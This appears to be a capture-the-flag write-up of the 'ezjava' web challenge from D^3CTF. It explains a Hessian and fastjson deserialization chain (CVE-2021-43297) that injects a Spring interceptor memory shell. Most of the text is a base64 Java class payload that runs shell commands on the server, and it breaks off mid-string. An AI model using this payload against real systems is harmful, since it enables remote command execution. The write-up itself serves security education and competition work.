D^3CTF Writeup by X1cT34m

文章目录

1 Web
2 Misc
3 Re
- 3.1 d3recover
- 3.2 d3sky

Web

ezjava

整体思路就是通过先打register，然后注入内存马控制/blacklist/jdk/get的返回值为恶意反序列化数据完成对server的攻击

hessian的反序列化通过CVE-2021-43297触发fastjson的toString然后去调用javax.naming.spi.ContinuationDirContext 的getter加载任意类，然后这个地方要用jdk高版本绕过的方法，加载本地factory，完成不出网利用。后面打server的时候直接把黑名单置空就可以直接打fastjson的原生反序列化就可以了

poc：

String x = "var str='yv66vgAAADQA8QoANQB5CQB6AHsJADEAfAoAfQB+CgB/AIAIAIEKAH8AggoAgwCEBwCFCgAJAIYIAIcKAAkAiAoACQCJCgAJAIoIAIsLAIwAjQoAfQCOCACPCACQCACRCgCSAJMKAAkAlAgAlQgAlgsAlwCYCwCXAJkKAJoAmwoAmgCcCgCaAJ0LADYAngsANgCfCACgCgChAKIIAKMLAKQApQcApgcApwsAJACoBwCpCACqCgCrAKwHAK0KACoArgoArwCwCgCvALEHALIHALMKAC8ArgcAtAoAMQB5CwAuALUIALYHALcHALgBAARudW1zAQABSQEABjxpbml0PgEAAygpVgEABENvZGUBAA9MaW5lTnVtYmVyVGFibGUBABJMb2NhbFZhcmlhYmxlVGFibGUBAAR0aGlzAQAkTGNvbS9qYXZhL3BheWxvYWRzL21hZ2ljSW50ZXJjZXB0b3I7AQAJcHJlSGFuZGxlAQBkKExqYXZheC9zZXJ2bGV0L2h0dHAvSHR0cFNlcnZsZXRSZXF1ZXN0O0xqYXZheC9zZXJ2bGV0L2h0dHAvSHR0cFNlcnZsZXRSZXNwb25zZTtMamF2YS9sYW5nL09iamVjdDspWgEABGNvZGUBABJMamF2YS9sYW5nL1N0cmluZzsBAAZyZXN1bHQBAAdyZXF1ZXN0AQAnTGphdmF4L3NlcnZsZXQvaHR0cC9IdHRwU2VydmxldFJlcXVlc3Q7AQAIcmVzcG9uc2UBAChMamF2YXgvc2VydmxldC9odHRwL0h0dHBTZXJ2bGV0UmVzcG9uc2U7AQAHaGFuZGxlcgEAEkxqYXZhL2xhbmcvT2JqZWN0OwEAAmluAQAVTGphdmEvaW8vSW5wdXRTdHJlYW07AQABcwEAE0xqYXZhL3V0aWwvU2Nhbm5lcjsBAAZvdXRwdXQBAA1TdGFja01hcFRhYmxlBwC5BwCFBwC6BwC0BwC7BwC8BwC3AQAKRXhjZXB0aW9ucwcAvQEACnBvc3RIYW5kbGUBAJIoTGphdmF4L3NlcnZsZXQvaHR0cC9IdHRwU2VydmxldFJlcXVlc3Q7TGphdmF4L3NlcnZsZXQvaHR0cC9IdHRwU2VydmxldFJlc3BvbnNlO0xqYXZhL2xhbmcvT2JqZWN0O0xvcmcvc3ByaW5nZnJhbWV3b3JrL3dlYi9zZXJ2bGV0L01vZGVsQW5kVmlldzspVgEADG1vZGVsQW5kVmlldwEALkxvcmcvc3ByaW5nZnJhbWV3b3JrL3dlYi9zZXJ2bGV0L01vZGVsQW5kVmlldzsBAA9hZnRlckNvbXBsZXRpb24BAHkoTGphdmF4L3NlcnZsZXQvaHR0cC9IdHRwU2VydmxldFJlcXVlc3Q7TGphdmF4L3NlcnZsZXQvaHR0cC9IdHRwU2VydmxldFJlc3BvbnNlO0xqYXZhL2xhbmcvT2JqZWN0O0xqYXZhL2xhbmcvRXhjZXB0aW9uOylWAQACZXgBABVMamF2YS9sYW5nL0V4Y2VwdGlvbjsBAAg8Y2xpbml0PgEAAWUBACBMamF2YS9sYW5nL05vU3VjaEZpZWxkRXhjZXB0aW9uOwEAIkxqYXZhL2xhbmcvSWxsZWdhbEFjY2Vzc0V4Y2VwdGlvbjsBAAdjb250ZXh0AQA3TG9yZy9zcHJpbmdmcmFtZXdvcmsvd2ViL2NvbnRleHQvV2ViQXBwbGljYXRpb25Db250ZXh0OwEAFW1hcHBpbmdIYW5kbGVyTWFwcGluZwEAVExvcmcvc3ByaW5nZnJhbWV3b3JrL3dlYi9zZXJ2bGV0L212Yy9tZXRob2QvYW5ub3RhdGlvbi9SZXF1ZXN0TWFwcGluZ0hhbmRsZXJNYXBwaW5nOwEABWZpZWxkAQAZTGphdmEvbGFuZy9yZWZsZWN0L0ZpZWxkOwEAEWFkYXB0SW50ZXJjZXB0b3JzAQAQTGphdmEvdXRpbC9MaXN0OwEAD2V2aWxJbnRlcmNlcHRvcgEAFkxvY2FsVmFyaWFibGVUeXBlVGFibGUBAEZMamF2YS91dGlsL0xpc3Q8TG9yZy9zcHJpbmdmcmFtZXdvcmsvd2ViL3NlcnZsZXQvSGFuZGxlckludGVyY2VwdG9yOz47BwCmBwCnBwC+BwCtBwCyBwCzAQAKU291cmNlRmlsZQEAFW1hZ2ljSW50ZXJjZXB0b3IuamF2YQwAOQA6BwC/DADAAMEMADcAOAcAwgwAwwDEBwDFDADGAMcBAAljYXQgL2ZsYWcMAMgAyQcAygwAywDMAQARamF2YS91dGlsL1NjYW5uZXIMADkAzQEAAlxBDADOAM8MANAA0QwA0gDTAQAABwC7DADUANMMAMMA1QEnU3siY29kZSI6IjIwMCIsIm1lc3NhZ2UiOiJyTzBBQlhOeUFCRnFZWFpoTG5WMGFXd3VTR0Z6YUUxaGNBVUgyc0hERm1EUkF3QUNSZ0FLYkc5aFpFWmhZM1J2Y2trQUNYUm9jbVZ6YUc5c1pIaHdQMEFBQUFBQUFBQjNDQUFBQUFJQUFBQUNjM0VBZmdBQVAwQUFBQUFBQUF4M0NBQUFBQkFBQUFBQ2RBQUNlWGx6Y2dBZlkyOXRMbUZzYVdKaFltRXVabUZ6ZEdwemIyNHlMa3BUVDA1QmNuSmhlUUFBQUFBQUFBQUJBZ0FBZUhJQUUycGhkbUV1ZFhScGJDNUJjbkpoZVV4cGMzUjRnZElkbWNkaG5RTUFBVWtBQkhOcGVtVjRjQUFBQUFGM0JBQUFBQUZ6Y2dBNlkyOXRMbk4xYmk1dmNtY3VZWEJoWTJobExuaGhiR0Z1TG1sdWRHVnlibUZzTG5oemJIUmpMblJ5WVhndVZHVnRjR3hoZEdWelNXMXdiQWxYVDhGdXJLc3pBd0FHU1FBTlgybHVaR1Z1ZEU1MWJXSmxja2tBRGw5MGNtRnVjMnhsZEVsdVpHVjRXd0FLWDJKNWRHVmpiMlJsYzNRQUExdGJRbHNBQmw5amJHRnpjM1FBRWx0TWFtRjJZUzlzWVc1bkwwTnNZWE56TzB3QUJWOXVZVzFsZEFBU1RHcGhkbUV2YkdGdVp5OVRkSEpwYm1jN1RBQVJYMjkxZEhCMWRGQnliM0JsY25ScFpYTjBBQlpNYW1GMllTOTFkR2xzTDFCeWIzQmxjblJwWlhNN2VIQUFBQUFBLy8vLy8zVnlBQU5iVzBKTC9Sa1ZaMmZiTndJQUFIaHdBQUFBQVhWeUFBSmJRcXp6Ri9nR0NGVGdBZ0FBZUhBQUFCb015djY2dmdBQUFEUUJNd29BUUFDWENBQ1lDQUNaQ2dDYUFKc0tBSm9BbkFvQW5RQ2VDUUNmQUtBSkFEd0FvUW9Bb2dDakNnQ2tBS1VJQUtZS0FLUUFwd29BcUFDcEJ3Q3FDZ0FPQUtzSUFLd0tBQTRBclFvQURnQ3VDZ0FPQUs4S0FLSUFzQWNBc1FvQUZRQ1hDQUN5Q2dBVkFMTUtBTFFBdFFvQXRnQzNDZ0M0QUxrSUFMb0tBQlVBdXdzQXZBQzlDQUMrQ2dDMkFMOEtBQTRBd0FnQXdRZ0F3Z3NBd3dERUN3RERBTVVLQU1ZQXh3b0F4Z0RJQ2dER0FNa0xBRUVBeWdzQVFRRExDQURNQ2dETkFNNElBTThMQU5BQTBRY0EwZ2NBMHdzQUx3RFVCd0RWQ0FEV0NnRFhBTmdIQU5rS0FEVUEyZ29BMndEY0NnRGJBTjBIQU40SEFOOEtBRG9BMmdjQTRBb0FQQUNYQ3dBNUFPRUlBT0lIQU9NSEFPUUJBQVJ1ZFcxekFRQUJTUUVBQmp4cGJtbDBQZ0VBQXlncFZnRUFCRU52WkdVQkFBOU1hVzVsVG5WdFltVnlWR0ZpYkdVQkFCSk1iMk5oYkZaaGNtbGhZbXhsVkdGaWJHVUJBQVIwYUdsekFRQW1UR052YlM5amRHWXZaWHB6WlhJdmRYUnBiSE12YldGbmFXTkpiblJsY21ObGNIUnZjanNCQUF4eVpYQnNZV05sUW14aGJtc0JBQ1lvVEdwaGRtRXZiR0Z1Wnk5VGRISnBibWM3S1V4cVlYWmhMMnhoYm1jdlUzUnlhVzVuT3dFQUFYQUJBQmxNYW1GMllTOTFkR2xzTDNKbFoyVjRMMUJoZEhSbGNtNDdBUUFCYlFFQUdVeHFZWFpoTDNWMGFXd3ZjbVZuWlhndlRXRjBZMmhsY2pzQkFBTnpkSElCQUJKTWFtRjJZUzlzWVc1bkwxTjBjbWx1WnpzQkFBUmtaWE4wQVFBTlUzUmhZMnROWVhCVVlXSnNaUWNBNVFFQUNYQnlaVWhoYm1Sc1pRRUFaQ2hNYW1GMllYZ3ZjMlZ5ZG14bGRDOW9kSFJ3TDBoMGRIQlRaWEoyYkdWMFVtVnhkV1Z6ZER0TWFtRjJZWGd2YzJWeWRteGxkQzlvZEhSd0wwaDBkSEJUWlhKMmJHVjBVbVZ6Y0c5dWMyVTdUR3BoZG1FdmJHRnVaeTlQWW1wbFkzUTdLVm9CQUFaeVpYTjFiSFFCQUFkeVpYRjFaWE4wQVFBblRHcGhkbUY0TDNObGNuWnNaWFF2YUhSMGNDOUlkSFJ3VTJWeWRteGxkRkpsY1hWbGMzUTdBUUFJY21WemNHOXVjMlVCQUNoTWFtRjJZWGd2YzJWeWRteGxkQzlvZEhSd0wwaDBkSEJUWlhKMmJHVjBVbVZ6Y0c5dWMyVTdBUUFIYUdGdVpHeGxjZ0VBRWt4cVlYWmhMMnhoYm1jdlQySnFaV04wT3dFQUJHTnZaR1VCQUFKcGJnRUFGVXhxWVhaaEwybHZMMGx1Y0hWMFUzUnlaV0Z0T3dFQUFYTUJBQk5NYW1GMllTOTFkR2xzTDFOallXNXVaWEk3QVFBR2IzVjBjSFYwQndEbUJ3Q3FCd0RnQndEbkJ3RG9Cd0RwQVFBS1JYaGpaWEIwYVc5dWN3Y0E2Z0VBQ25CdmMzUklZVzVrYkdVQkFKSW9UR3BoZG1GNEwzTmxjblpzWlhRdmFIUjBjQzlJZEhSd1UyVnlkbXhsZEZKbGNYVmxjM1E3VEdwaGRtRjRMM05sY25ac1pYUXZhSFIwY0M5SWRIUndVMlZ5ZG14bGRGSmxjM0J2Ym5ObE8weHFZWFpoTDJ4aGJtY3ZUMkpxWldOME8weHZjbWN2YzNCeWFXNW5abkpoYldWM2IzSnJMM2RsWWk5elpYSjJiR1YwTDAxdlpHVnNRVzVrVm1sbGR6c3BWZ0VBREcxdlpHVnNRVzVrVm1sbGR3RUFMa3h2Y21jdmMzQnlhVzVuWm5KaGJXVjNiM0pyTDNkbFlpOXpaWEoyYkdWMEwwMXZaR1ZzUVc1a1ZtbGxkenNCQUE5aFpuUmxja052YlhCc1pYUnBiMjRCQUhrb1RHcGhkbUY0TDNObGNuWnNaWFF2YUhSMGNDOUlkSFJ3VTJWeWRteGxkRkpsY1hWbGMzUTdUR3BoZG1GNEwzTmxjblpzWlhRdmFIUjBjQzlJZEhSd1UyVnlkbXhsZEZKbGMzQnZibk5sTzB4cVlYWmhMMnhoYm1jdlQySnFaV04wTzB4cVlYWmhMMnhoYm1jdlJYaGpaWEIwYVc5dU95bFdBUUFDWlhnQkFCVk1hbUYyWVM5c1lXNW5MMFY0WTJWd2RHbHZianNCQUFsMGNtRnVjMlp2Y20wQkFISW9UR052YlM5emRXNHZiM0puTDJGd1lXTm9aUzk0WVd4aGJpOXBiblJsY201aGJDOTRjMngwWXk5RVQwMDdXMHhqYjIwdmMzVnVMMjl5Wnk5aGNHRmphR1V2ZUcxc0wybHVkR1Z5Ym1Gc0wzTmxjbWxoYkdsNlpYSXZVMlZ5YVdGc2FYcGhkR2x2YmtoaGJtUnNaWEk3S1ZZQkFBaGtiMk4xYldWdWRBRUFMVXhqYjIwdmMzVnVMMjl5Wnk5aGNHRmphR1V2ZUdGc1lXNHZhVzUwWlhKdVlXd3ZlSE5zZEdNdlJFOU5Pd0VBQ0doaGJtUnNaWEp6QVFCQ1cweGpiMjB2YzNWdUwyOXlaeTloY0dGamFHVXZlRzFzTDJsdWRHVnlibUZzTDNObGNtbGhiR2w2WlhJdlUyVnlhV0ZzYVhwaGRHbHZia2hoYm1Sc1pYSTdCd0RyQVFDbUtFeGpiMjB2YzNWdUwyOXlaeTloY0dGamFHVXZlR0ZzWVc0dmFXNTBaWEp1WVd3dmVITnNkR012UkU5Tk8weGpiMjB2YzNWdUwyOXlaeTloY0dGamFHVXZlRzFzTDJsdWRHVnlibUZzTDJSMGJTOUVWRTFCZUdselNYUmxjbUYwYjNJN1RHTnZiUzl6ZFc0dmIzSm5MMkZ3WVdOb1pTOTRiV3d2YVc1MFpYSnVZV3d2YzJWeWFXRnNhWHBsY2k5VFpYSnBZV3hwZW1GMGFXOXVTR0Z1Wkd4bGNqc3BWZ0VBQ0dsMFpYSmhkRzl5QVFBMVRHTnZiUzl6ZFc0dmIzSm5MMkZ3WVdOb1pTOTRiV3d2YVc1MFpYSnVZV3d2WkhSdEwwUlVUVUY0YVhOSmRHVnlZWFJ2Y2pzQkFFRk1ZMjl0TDNOMWJpOXZjbWN2WVhCaFkyaGxMM2h0YkM5cGJuUmxjbTVoYkM5elpYSnBZV3hwZW1WeUwxTmxjbWxoYkdsNllYUnBiMjVJWVc1a2JHVnlPd0VBQ0R4amJHbHVhWFErQVFBQlpRRUFJRXhxWVhaaEwyeGhibWN2VG05VGRXTm9SbWxsYkdSRmVHTmxjSFJwYjI0N0FRQWlUR3BoZG1FdmJHRnVaeTlKYkd4bFoyRnNRV05qWlhOelJYaGpaWEIwYVc5dU93RUFCMk52Ym5SbGVIUUJBRGRNYjNKbkwzTndjbWx1WjJaeVlXMWxkMjl5YXk5M1pXSXZZMjl1ZEdWNGRDOVhaV0pCY0hCc2FXTmhkR2x2YmtOdmJuUmxlSFE3QVFBVmJXRndjR2x1WjBoaGJtUnNaWEpOWVhCd2FXNW5BUUJVVEc5eVp5OXpjSEpwYm1kbWNtRnRaWGR2Y21zdmQyVmlMM05sY25ac1pYUXZiWFpqTDIxbGRHaHZaQzloYm01dmRHRjBhVzl1TDFKbGNYVmxjM1JOWVhCd2FXNW5TR0Z1Wkd4bGNrMWhjSEJwYm1jN0FRQUZabWxsYkdRQkFCbE1hbUYyWVM5c1lXNW5MM0psWm14bFkzUXZSbWxsYkdRN0FRQVJZV1JoY0hSSmJuUmxjbU5sY0hSdmNuTUJBQkJNYW1GMllTOTFkR2xzTDB4cGMzUTdBUUFQWlhacGJFbHVkR1Z5WTJWd2RHOXlBUUFXVEc5allXeFdZWEpwWVdKc1pWUjVjR1ZVWVdKc1pRRUFSa3hxWVhaaEwzVjBhV3d2VEdsemREeE1iM0puTDNOd2NtbHVaMlp5WVcxbGQyOXlheTkzWldJdmMyVnlkbXhsZEM5SVlXNWtiR1Z5U1c1MFpYSmpaWEIwYjNJN1Bqc0hBTklIQU5NSEFPd0hBTmtIQU40SEFOOEJBQXBUYjNWeVkyVkdhV3hsQVFBVmJXRm5hV05KYm5SbGNtTmxjSFJ2Y2k1cVlYWmhEQUJFQUVVQkFBQUJBQWxjY3lwOENYd05mQW9IQU8wTUFPNEE3d3dBOEFEeEJ3RHlEQUR6QUV3SEFQUU1BUFVBOWd3QVFnQkRCd0QzREFENEFQa0hBUG9NQVBzQS9BRUFER3h6SUMxaGJDQXZjbTl2ZEF3QS9RRCtCd0QvREFFQUFRRUJBQkZxWVhaaEwzVjBhV3d2VTJOaGJtNWxjZ3dBUkFFQ0FRQUNYRUVNQVFNQkJBd0JCUUVHREFFSEFRZ01BUGdCQ1FFQUYycGhkbUV2YkdGdVp5OVRkSEpwYm1kQ2RXbHNaR1Z5QVFBWmV5SmpiMlJsSWpvaU1qQXdJaXdpYldWemMyRm5aU0k2SWd3QkNnRUxCd0VNREFFTkFSQUhBT1VNQVJFQkVnY0JFd3dCRkFFVkFRQUNJbjBNQVJZQkNBY0E1d3dCRndFSUFRQUhMM04wWVhSMWN3d0JHQUVaREFCRUFRa0JBQXhEYjI1MFpXNTBMVlI1Y0dVQkFCNWhjSEJzYVdOaGRHbHZiaTlxYzI5dU8yTm9ZWEp6WlhROVZWUkdMVGdIQU9nTUFSb0JHd3dCSEFFZEJ3RWVEQUVmQVFrTUFTQUFSUXdCSVFCRkRBQnRBRzRNQUhFQWNnRUFCbk4wWVdGeWRBY0JJZ3dCSXdFa0FRQTViM0puTG5Od2NtbHVaMlp5WVcxbGQyOXlheTUzWldJdWMyVnlkbXhsZEM1RWFYTndZWFJqYUdWeVUyVnlkbXhsZEM1RFQwNVVSVmhVQndFbERBRW1BU2NCQURWdmNtY3ZjM0J5YVc1blpuSmhiV1YzYjNKckwzZGxZaTlqYjI1MFpYaDBMMWRsWWtGd2NHeHBZMkYwYVc5dVEyOXVkR1Y0ZEFFQVVtOXlaeTl6Y0hKcGJtZG1jbUZ0WlhkdmNtc3ZkMlZpTDNObGNuWnNaWFF2YlhaakwyMWxkR2h2WkM5aGJtNXZkR0YwYVc5dUwxSmxjWFZsYzNSTllYQndhVzVuU0dGdVpHeGxjazFoY0hCcGJtY01BU2dCS1FFQVBtOXlaeTl6Y0hKcGJtZG1jbUZ0WlhkdmNtc3ZkMlZpTDNObGNuWnNaWFF2YUdGdVpHeGxjaTlCWW5OMGNtRmpkRWhoYm1Sc1pYSk5ZWEJ3YVc1bkFRQVRZV1JoY0hSbFpFbHVkR1Z5WTJWd2RHOXljd2NCS2d3Qkt3RXNBUUFlYW1GMllTOXNZVzVuTDA1dlUzVmphRVpwWld4a1JYaGpaWEIwYVc5dURBRXRBRVVIQU93TUFTNEJMd3dCTUFFeEFRQU9hbUYyWVM5MWRHbHNMMHhwYzNRQkFDQnFZWFpoTDJ4aGJtY3ZTV3hzWldkaGJFRmpZMlZ6YzBWNFkyVndkR2x2YmdFQUpHTnZiUzlqZEdZdlpYcHpaWEl2ZFhScGJITXZiV0ZuYVdOSmJuUmxjbU5sY0hSdmNnd0JNZ0VaQVFBQ2Iyc0JBRUJqYjIwdmMzVnVMMjl5Wnk5aGNHRmphR1V2ZUdGc1lXNHZhVzUwWlhKdVlXd3ZlSE5zZEdNdmNuVnVkR2x0WlM5QlluTjBjbUZqZEZSeVlXNXpiR1YwQVFBeWIzSm5MM053Y21sdVoyWnlZVzFsZDI5eWF5OTNaV0l2YzJWeWRteGxkQzlJWVc1a2JHVnlTVzUwWlhKalpYQjBiM0lCQUJCcVlYWmhMMnhoYm1jdlUzUnlhVzVuQVFBVGFtRjJZUzlwYnk5SmJuQjFkRk4wY21WaGJRRUFKV3BoZG1GNEwzTmxjblpzWlhRdmFIUjBjQzlJZEhSd1UyVnlkbXhsZEZKbGNYVmxjM1FCQUNacVlYWmhlQzl6WlhKMmJHVjBMMmgwZEhBdlNIUjBjRk5sY25ac1pYUlNaWE53YjI1elpRRUFFR3BoZG1FdmJHRnVaeTlQWW1wbFkzUUJBQk5xWVhaaEwyeGhibWN2UlhoalpYQjBhVzl1QVFBNVkyOXRMM04xYmk5dmNtY3ZZWEJoWTJobEwzaGhiR0Z1TDJsdWRHVnlibUZzTDNoemJIUmpMMVJ5WVc1emJHVjBSWGhqWlhCMGFXOXVBUUFYYW1GMllTOXNZVzVuTDNKbFpteGxZM1F2Um1sbGJHUUJBQmRxWVhaaEwzVjBhV3d2Y21WblpYZ3ZVR0YwZEdWeWJnRUFCMk52YlhCcGJHVUJBQzBvVEdwaGRtRXZiR0Z1Wnk5VGRISnBibWM3S1V4cVlYWmhMM1YwYVd3dmNtVm5aWGd2VUdGMGRHVnlianNCQUFkdFlYUmphR1Z5QVFBektFeHFZWFpoTDJ4aGJtY3ZRMmhoY2xObGNYVmxibU5sT3lsTWFtRjJZUzkxZEdsc0wzSmxaMlY0TDAxaGRHTm9aWEk3QVFBWGFtRjJZUzkxZEdsc0wzSmxaMlY0TDAxaGRHTm9aWElCQUFweVpYQnNZV05sUVd4c0FRQVFhbUYyWVM5c1lXNW5MMU41YzNSbGJRRUFBMjkxZEFFQUZVeHFZWFpoTDJsdkwxQnlhVzUwVTNSeVpXRnRPd0VBRTJwaGRtRXZhVzh2VUhKcGJuUlRkSEpsWVcwQkFBZHdjbWx1ZEd4dUFRQUVLRWtwVmdFQUVXcGhkbUV2YkdGdVp5OVNkVzUwYVcxbEFRQUtaMlYwVW5WdWRHbHRaUUVBRlNncFRHcGhkbUV2YkdGdVp5OVNkVzUwYVcxbE93RUFCR1Y0WldNQkFDY29UR3BoZG1FdmJHRnVaeTlUZEhKcGJtYzdLVXhxWVhaaEwyeGhibWN2VUhKdlkyVnpjenNCQUJGcVlYWmhMMnhoYm1jdlVISnZZMlZ6Y3dFQURtZGxkRWx1Y0hWMFUzUnlaV0Z0QVFBWEtDbE1hbUYyWVM5cGJ5OUpibkIxZEZOMGNtVmhiVHNCQUJnb1RHcGhkbUV2YVc4dlNXNXdkWFJUZEhKbFlXMDdLVllCQUF4MWMyVkVaV3hwYldsMFpYSUJBQ2NvVEdwaGRtRXZiR0Z1Wnk5VGRISnBibWM3S1V4cVlYWmhMM1YwYVd3dlUyTmhibTVsY2pzQkFBZG9ZWE5PWlhoMEFRQURLQ2xhQVFBRWJtVjRkQUVBRkNncFRHcGhkbUV2YkdGdVp5OVRkSEpwYm1jN0FRQVZLRXhxWVhaaEwyeGhibWN2VTNSeWFXNW5PeWxXQVFBR1lYQndaVzVrQVFBdEtFeHFZWFpoTDJ4aGJtY3ZVM1J5YVc1bk95bE1hbUYyWVM5c1lXNW5MMU4wY21sdVowSjFhV3hrWlhJN0FRQVFhbUYyWVM5MWRHbHNMMEpoYzJVMk5BRUFDbWRsZEVWdVkyOWtaWElCQUFkRmJtTnZaR1Z5QVFBTVNXNXVaWEpEYkdGemMyVnpBUUFjS0NsTWFtRjJZUzkxZEdsc0wwSmhjMlUyTkNSRmJtTnZaR1Z5T3dFQUNHZGxkRUo1ZEdWekFRQUVLQ2xiUWdFQUdHcGhkbUV2ZFhScGJDOUNZWE5sTmpRa1JXNWpiMlJsY2dFQURtVnVZMjlrWlZSdlUzUnlhVzVuQVFBV0tGdENLVXhxWVhaaEwyeGhibWN2VTNSeWFXNW5Pd0VBQ0hSdlUzUnlhVzVuQVFBTloyVjBVbVZ4ZFdWemRGVlNTUUVBQm1WeGRXRnNjd0VBRlNoTWFtRjJZUzlzWVc1bkwwOWlhbVZqZERzcFdnRUFDV0ZrWkVobFlXUmxjZ0VBSnloTWFtRjJZUzlzWVc1bkwxTjBjbWx1Wnp0TWFtRjJZUzlzWVc1bkwxTjBjbWx1WnpzcFZnRUFDV2RsZEZkeWFYUmxjZ0VBRnlncFRHcGhkbUV2YVc4dlVISnBiblJYY21sMFpYSTdBUUFUYW1GMllTOXBieTlRY21sdWRGZHlhWFJsY2dFQUJYZHlhWFJsQVFBRlpteDFjMmdCQUFWamJHOXpaUUVBUEc5eVp5OXpjSEpwYm1kbWNtRnRaWGR2Y21zdmQyVmlMMk52Ym5SbGVIUXZjbVZ4ZFdWemRDOVNaWEYxWlhOMFEyOXVkR1Y0ZEVodmJHUmxjZ0VBR0dOMWNuSmxiblJTWlhGMVpYTjBRWFIwY21saWRYUmxjd0VBUFNncFRHOXlaeTl6Y0hKcGJtZG1jbUZ0WlhkdmNtc3ZkMlZpTDJOdmJuUmxlSFF2Y21WeGRXVnpkQzlTWlhGMVpYTjBRWFIwY21saWRYUmxjenNCQURsdmNtY3ZjM0J5YVc1blpuSmhiV1YzYjNKckwzZGxZaTlqYjI1MFpYaDBMM0psY1hWbGMzUXZVbVZ4ZFdWemRFRjBkSEpwWW5WMFpYTUJBQXhuWlhSQmRIUnlhV0oxZEdVQkFDY29UR3BoZG1FdmJHRnVaeTlUZEhKcGJtYzdTU2xNYW1GMllTOXNZVzVuTDA5aWFtVmpkRHNCQUFkblpYUkNaV0Z1QVFBbEtFeHFZWFpoTDJ4aGJtY3ZRMnhoYzNNN0tVeHFZWFpoTDJ4aGJtY3ZUMkpxWldOME93RUFEMnBoZG1FdmJHRnVaeTlEYkdGemN3RUFFR2RsZEVSbFkyeGhjbVZrUm1sbGJHUUJBQzBvVEdwaGRtRXZiR0Z1Wnk5VGRISnBibWM3S1V4cVlYWmhMMnhoYm1jdmNtVm1iR1ZqZEM5R2FXVnNaRHNCQUE5d2NtbHVkRk4wWVdOclZISmhZMlVCQUExelpYUkJZMk5sYzNOcFlteGxBUUFFS0ZvcFZnRUFBMmRsZEFFQUppaE1hbUYyWVM5c1lXNW5MMDlpYW1WamREc3BUR3BoZG1FdmJHRnVaeTlQWW1wbFkzUTdBUUFEWVdSa0FDRUFQQUJBQUFFQVFRQUJBQWtBUWdCREFBQUFDQUFCQUVRQVJRQUJBRVlBQUFBdkFBRUFBUUFBQUFVcXR3QUJzUUFBQUFJQVJ3QUFBQVlBQVFBQUFDVUFTQUFBQUF3QUFRQUFBQVVBU1FCS0FBQUFDUUJMQUV3QUFRQkdBQUFBaGdBQ0FBUUFBQUFjRWdKTUtzWUFGaElEdUFBRVRTd3F0Z0FGVGkwU0FyWUFCa3dyc0FBQUFBTUFSd0FBQUJvQUJnQUFBRDhBQXdCQkFBY0FRd0FOQUVVQUV3QkhBQm9BU3dCSUFBQUFLZ0FFQUEwQURRQk5BRTRBQWdBVEFBY0FUd0JRQUFNQUFBQWNBRkVBVWdBQUFBTUFHUUJUQUZJQUFRQlVBQUFBQ0FBQi9BQWFCd0JWQUFFQVZnQlhBQUlBUmdBQUFhRUFBd0FKQUFBQXVySUFCN0lBQ0xZQUNiZ0FDaElMdGdBTXRnQU5PZ1c3QUE1WkdRVzNBQThTRUxZQUVUb0dHUWEyQUJLWkFBc1pCcllBRTZjQUJSSUNPZ2V5QUFjWkI3WUFGTHNBRlZtM0FCWVNGN1lBR0xnQUdSa0h0Z0FhdGdBYnRnQVlFaHkyQUJpMkFCMDZCQ3U1QUI0QkFCSWZ0Z0FnbVFCSHV3QU9XUmtFdHdBaEVoQzJBQkcyQUJNNkNDd1NJaElqdVFBa0F3QXN1UUFsQVFBWkNMWUFKaXk1QUNVQkFMWUFKeXk1QUNVQkFMWUFLTElBQ0FSZ3N3QUlBNndFckFBQUFBTUFSd0FBQUQ0QUR3QUFBRlFBQ1FCWUFCWUFXUUFtQUZvQU9nQmlBRUlBWlFCbUFHMEFkQUJ1QUljQWNnQ1JBSE1BbkFCMEFLVUFkUUN1QUhZQXRnQjNBTGdBakFCSUFBQUFYQUFKQUljQU1RQllBRklBQ0FBQUFMb0FTUUJLQUFBQUFBQzZBRmtBV2dBQkFBQUF1Z0JiQUZ3QUFnQUFBTG9BWFFCZUFBTUFaZ0JVQUY4QVVnQUVBQllBcEFCZ0FHRUFCUUFtQUpRQVlnQmpBQVlBT2dDQUFHUUFVZ0FIQUZRQUFBQXZBQVArQURZQUJ3QmxCd0JtUVFjQVZmOEFmd0FJQndCbkJ3Qm9Cd0JwQndCcUJ3QlZCd0JsQndCbUJ3QlZBQUFBYXdBQUFBUUFBUUJzQUFFQWJRQnVBQUlBUmdBQUFHQUFCUUFGQUFBQUNpb3JMQzBaQkxjQUtiRUFBQUFDQUVjQUFBQUtBQUlBQUFDUkFBa0FrZ0JJQUFBQU5BQUZBQUFBQ2dCSkFFb0FBQUFBQUFvQVdRQmFBQUVBQUFBS0FGc0FYQUFDQUFBQUNnQmRBRjRBQXdBQUFBb0Fid0J3QUFRQWF3QUFBQVFBQVFCc0FBRUFjUUJ5QUFJQVJnQUFBR0FBQlFBRkFBQUFDaW9yTEMwWkJMY0FLckVBQUFBQ0FFY0FBQUFLQUFJQUFBQ1dBQWtBbHdCSUFBQUFOQUFGQUFBQUNnQkpBRW9BQUFBQUFBb0FXUUJhQUFFQUFBQUtBRnNBWEFBQ0FBQUFDZ0JkQUY0QUF3QUFBQW9BY3dCMEFBUUFhd0FBQUFRQUFRQnNBQUVBZFFCMkFBSUFSZ0FBQUQ4QUFBQURBQUFBQWJFQUFBQUNBRWNBQUFBR0FBRUFBQUNjQUVnQUFBQWdBQU1BQUFBQkFFa0FTZ0FBQUFBQUFRQjNBSGdBQVFBQUFBRUFlUUI2QUFJQWF3QUFBQVFBQVFCN0FBRUFkUUI4QUFJQVJnQUFBRWtBQUFBRUFBQUFBYkVBQUFBQ0FFY0FBQUFHQUFFQUFBQ2hBRWdBQUFBcUFBUUFBQUFCQUVrQVNnQUFBQUFBQVFCM0FIZ0FBUUFBQUFFQWZRQitBQUlBQUFBQkFGMEFmd0FEQUdzQUFBQUVBQUVBZXdBSUFJQUFSUUFCQUVZQUFBRnhBQU1BQlFBQUFHNEVzd0FJc2dBSEVpdTJBQlM0QUN3U0xRTzVBQzREQU1BQUwwc3FFakM1QURFQ0FNQUFNRXdCVFJJeUVqTzJBRFJOcHdBSVRpMjJBRFlzQkxZQU53Rk9MQ3UyQURqQUFEbE9wd0FLT2dRWkJMWUFPN3NBUEZtM0FEMDZCQzBaQkxrQVBnSUFWN0lBQnhJL3RnQVVzUUFDQUNrQU1RQTBBRFVBUUFCSkFFd0FPZ0FFQUVjQUFBQk9BQk1BQUFBbkFBUUFLUUFNQUNvQUd3QXJBQ2NBTEFBcEFDNEFNUUF4QURRQUx3QTFBREFBT1FBeUFENEFNd0JBQURVQVNRQTRBRXdBTmdCT0FEY0FVd0E1QUZ3QU9nQmxBRHNBYlFBOEFFZ0FBQUJJQUFjQU5RQUVBSUVBZ2dBREFFNEFCUUNCQUlNQUJBQWJBRklBaEFDRkFBQUFKd0JHQUlZQWh3QUJB